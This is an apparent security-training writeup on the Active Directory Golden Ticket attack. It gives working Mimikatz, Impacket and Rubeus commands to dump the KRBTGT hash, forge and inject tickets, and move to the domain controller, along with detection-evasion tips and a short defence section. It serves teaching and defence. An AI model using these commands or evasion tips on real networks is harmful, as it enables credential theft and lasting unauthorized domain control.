Golden Ticket Attack

advanced40 minWriteup

Forging TGTs for persistent domain access

Learning Objectives

  • Understand golden tickets
  • Extract KRBTGT hash
  • Forge golden tickets
  • Maintain persistent access

The Golden Ticket attack is the nuclear option of Active Directory attacks. With the KRBTGT account's hash, you can forge Ticket Granting Tickets (TGTs) for ANY user - even non-existent ones - with ANY privileges, valid for years.

Think of KRBTGT as the master key that signs all VIP passes. If you have that master key, you can create unlimited VIP passes that every bouncer will accept as legitimate.

Extreme Persistence

Golden tickets persist even after password resets, user deletions, and system rebuilds. The ONLY way to invalidate them is to reset the KRBTGT password TWICE.

How Golden Tickets Work

1Normal Kerberos:
21. User authenticates, gets TGT encrypted with KRBTGT hash
32. TGT contains user's group memberships (PAC)
43. User presents TGT to get service tickets
54. KDC trusts TGT because it's encrypted with KRBTGT
6 
7Golden Ticket Attack:
81. Attacker obtains KRBTGT hash (DCSync, NTDS.dit)
92. Attacker forges TGT with:
10   - Any username (even fake ones!)
11   - Any group memberships (Domain Admins!)
12   - Long expiration (10 years!)
133. KDC accepts forged TGT as legitimate
144. Attacker has permanent domain access

Why It Works

The KDC doesn't validate TGT contents against AD - it just decrypts and trusts. If you can encrypt with KRBTGT hash, the ticket is "valid".

Obtaining KRBTGT Hash

DCSync Attack

bash
1606070;"># Requires: Domain Admin or DCSync rights
2 
3606070;"># Impacket secretsdump
4secretsdump.py corp.local/admin:password@dc.corp.local -just-dc-user krbtgt
5 
6606070;"># Mimikatz DCSync
7lsadump::dcsync /domain:corp.local /user:krbtgt

From NTDS.dit

bash
1606070;"># If you have NTDS.dit and SYSTEM hive
2secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL
3 
4606070;"># Extract just KRBTGT
5secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL | grep krbtgt

From Memory

1606070;"># Mimikatz on DC
2privilege::debug
3lsadump::lsa /inject /name:krbtgt

Forging the Golden Ticket

Required Information

1You need:
2├── KRBTGT NTLM hash (or AES key)
3├── Domain SID (S-1-5-21-...)
4├── Domain name (corp.local)
5└── Username to impersonate (Administrator)

Mimikatz

1606070;"># Get domain SID
2whoami /user   606070;"># Remove the last part (user RID)
3606070;"># Or: Get-ADDomain | Select-Object DomainSID
4 
5606070;"># Forge golden ticket
6kerberos::golden /user:Administrator /domain:corp.local \
7  /sid:S-1-5-21-1234567890-1234567890-1234567890 \
8  /krbtgt:a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx \
9  /ptt
10 
11606070;"># Options:
12606070;"># /user:     - Username (can be fake!)
13606070;"># /domain:   - Domain FQDN
14606070;"># /sid:      - Domain SID
15606070;"># /krbtgt:   - KRBTGT NTLM hash
16606070;"># /ptt       - Pass-the-Ticket (inject immediately)
17606070;"># /ticket:   - Save to file instead
18 
19606070;"># Inject saved ticket
20kerberos::ptt ticket.kirbi

Impacket (Linux)

bash
1606070;"># Create golden ticket
2ticketer.py -nthash a9b30e5bxxxxxxxxxxxxxxxxxxxxxxxx \
3  -domain-sid S-1-5-21-1234567890-1234567890-1234567890 \
4  -domain corp.local Administrator
5 
6606070;"># Use the ticket
7export KRB5CCNAME=Administrator.ccache
8psexec.py -k -no-pass corp.local/Administrator@dc.corp.local

Rubeus

powershell
1606070;"># Create and inject golden ticket
2.\Rubeus.exe golden /user:Administrator /domain:corp.local \
3  /sid:S-1-5-21-... /rc4:a9b30e5b... /ptt
4 
5606070;"># With AES key (more stealthy)
6.\Rubeus.exe golden /user:Administrator /domain:corp.local \
7  /sid:S-1-5-21-... /aes256:... /ptt

Use AES Keys

Modern detection looks for RC4 tickets when AES is available. Use AES256 keys when possible for stealthier golden tickets.

Using the Golden Ticket

bash
1606070;"># After injecting ticket, access any resource
2 
3606070;"># List DC shares
4dir \\dc.corp.local\c$
5 
6606070;"># PsExec to DC
7psexec.exe \\dc.corp.local cmd.exe
8 
9606070;"># Linux with exported ticket
10export KRB5CCNAME=Administrator.ccache
11smbclient 606070;">//dc.corp.local/C$ -k -no-pass
12psexec.py -k -no-pass corp.local/Administrator@dc.corp.local
13 
14606070;"># DCSync (you're now Domain Admin!)
15secretsdump.py -k -no-pass corp.local/Administrator@dc.corp.local

Stealth Considerations

  • Use real usernames: Fake users might get flagged
  • Use AES keys: RC4 is suspicious in modern environments
  • Reasonable validity: 10-year tickets look suspicious
  • Match group membership: Use realistic group SIDs
1606070;"># Stealthier golden ticket options
2/startoffset:-10      606070;"># Ticket started 10 mins ago
3/endin:600            606070;"># Valid for 10 hours
4/renewmax:10080       606070;"># 7 day renewal

Detection & Defense

1Detection:
2├── Event ID 4769 - TGS request with non-existent user
3├── Event ID 4624 - Logon with suspicious ticket
4├── AES/RC4 mismatch in environment
5└── Tickets with unusual validity periods
6 
7Defense:
8├── Reset KRBTGT password TWICE (different days)
9├── Reduce KRBTGT password age
10├── Monitor for DCSync operations
11├── Alert on direct LDAP access to KRBTGT
12└── Credential Guard prevents hash extraction

KRBTGT Reset Procedure

Resetting KRBTGT ONCE doesn't help - AD keeps the previous password for ticket validation. You must reset TWICE (with time between) to fully invalidate golden tickets.

Golden Ticket Methodology

Golden Ticket Attack Flow

1
Compromise DAGet Domain Admin access first
2
DCSyncExtract KRBTGT hash via DCSync
3
Get Domain SIDwhoami /user or Get-ADDomain
4
Forge TicketUse Mimikatz/Rubeus/ticketer.py
5
InjectPass-the-Ticket into current session
6
PersistSave ticket for future access

Knowledge Check

Quick Quiz
Question 1 of 3

What is required to forge a golden ticket?

Challenges

Forge the Ticket

Challenge
💀 advanced

With Domain Admin access, extract the KRBTGT hash and create a golden ticket that provides persistent access.

Need a hint? (4 available)

Key Takeaways

  • Golden tickets forge TGTs using the KRBTGT hash
  • Any user, any privileges, any validity period
  • Survives password resets and user deletions
  • Requires KRBTGT hash and domain SID
  • Only invalidated by resetting KRBTGT TWICE
  • Use AES keys for stealthier tickets